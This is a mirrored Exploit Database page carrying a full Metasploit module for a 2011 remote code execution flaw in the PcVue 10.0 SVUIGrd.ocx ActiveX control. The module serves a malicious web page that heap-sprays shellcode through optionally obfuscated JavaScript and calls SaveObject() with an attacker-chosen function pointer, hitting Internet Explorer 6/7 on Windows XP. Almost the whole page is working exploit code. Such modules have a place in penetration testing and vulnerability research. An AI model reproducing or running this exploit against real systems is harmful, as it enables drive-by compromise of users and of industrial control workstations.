PcVue 10.0 SV.UIGrdCtrl.1 – ‘LoadObject()’/’SaveObject()’ Trusted DWORD (Metasploit)

• Exploit Database
• 142 阅读

• 作者： Metasploit
  日期： 2011-10-12
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17975/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175

  ## # $Id: pcvue_func.rb 13889 2011-10-12 10:57:31Z sinn3r $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking   include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => "PcVue 10.0 SV.UIGrdCtrl.1 &apos;LoadObject()/SaveObject()&apos; Trusted DWORD Vulnerability", &apos;Description&apos;=> %q{ This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0. By setting a dword value for the SaveObject() or LoadObject(), an attacker can overwrite a function pointer and execute arbitrary code. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Luigi Auriemma&apos;, # original find &apos;mr_me <steventhomasseeley[at]gmail-com>&apos;, # msf module &apos;TecR0c <roccogiovannicalvi[at]gmail-com >&apos;,# msf module ], &apos;Version&apos;=> &apos;$Revision: 13889 $&apos;, &apos;References&apos; => [ [ &apos;BID&apos;, &apos;49795&apos;], [ &apos;URL&apos;, &apos;http://aluigi.altervista.org/adv/pcvue_1-adv.txt&apos;], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, &apos;InitialAutoRunScript&apos; => &apos;migrate -f&apos; }, &apos;Payload&apos;=> { &apos;Space&apos; => 1024, &apos;BadChars&apos;=> "\x00\x0a\x0d", &apos;StackAdjustment&apos; => -3500, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ #IE 6/7 on Widnows XP and Vista &apos;Internet Explorer 6 / Internet Explorer 7&apos;, { &apos;Ret&apos;=> 0x0a0a0a0a, &apos;Offset&apos; => 1000 } ] ], &apos;DisclosureDate&apos; => &apos;Oct 5 2011&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ false, &apos;The file name.&apos;,&apos;msf.html&apos;]), OptBool.new(&apos;OBFUSCATE&apos;, [false, &apos;Enable JavaScript Obfuscation&apos;, true]), ], self.class) end   def on_request_uri(cli, request)   #If not IE, we don&apos;t continue agent = request.headers[&apos;User-Agent&apos;] if agent !~ /MSIE [6|7]\.0/ print_error("Target not supported: #{agent.to_s}") send_not_found(cli) return end   # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))   # Setup exploit buffers nops= Rex::Text.to_unescape([target.ret].pack(&apos;V&apos;)) ret = "0x%08x" % target.ret   blocksize = 0x50000 fillto= 200   # Randomize the javascript variable names obj_name = rand_text_alpha(rand(100) + 1) j_shellcode= rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_ret= rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock= rand_text_alpha(rand(100) + 1) j_block= rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter= rand_text_alpha(rand(30) + 2) j_txt = rand_text_alpha(rand(8) + 4)   js = <<-EOF var #{j_shellcode} = unescape(&apos;#{shellcode}&apos;); var #{j_nops} = unescape("#{nops}"); var #{j_headersize} = 20; var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length; while(#{j_nops}.length < #{j_slackspace}) { #{j_nops} += #{j_nops}; } var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) { #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; }   #{j_memory} = new Array(); for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){ #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ; }   function main(){ #{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0); } EOF   js = js.gsub(/^\t\t/, &apos;&apos;)   #JS obfuscation on demand if datastore[&apos;OBFUSCATE&apos;] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate main_sym = js.sym(&apos;main&apos;) else main_sym = "main" end   content = <<-EOF <html> <body> <object classid=&apos;clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9&apos; id=&apos;#{obj_name}&apos; ></object> <script language=&apos;javascript&apos;> #{js} #{main_sym}(); </script> </body> </html> EOF   #Remove the extra tabs from content content = content.gsub(/^\t\t/, &apos;&apos;)   print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}") send_response(cli, content, {&apos;Content-Type&apos;=>&apos;text/html&apos;}) end end     =begin Tested successfully on the following platforms: - PcVue 10.0 (SVUIGrd.ocx v1.5.1.0) on Internet Explorer 6 & 7, Windows XP SP3   Class SVUIGrdCtrl ProgID: SV.UIGrdCtrl.1 GUID: {2BBD45A5-28AE-11D1-ACAC-0800170967D9} Number of Interfaces: 1 Default Interface: ISVUIGrd RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False =end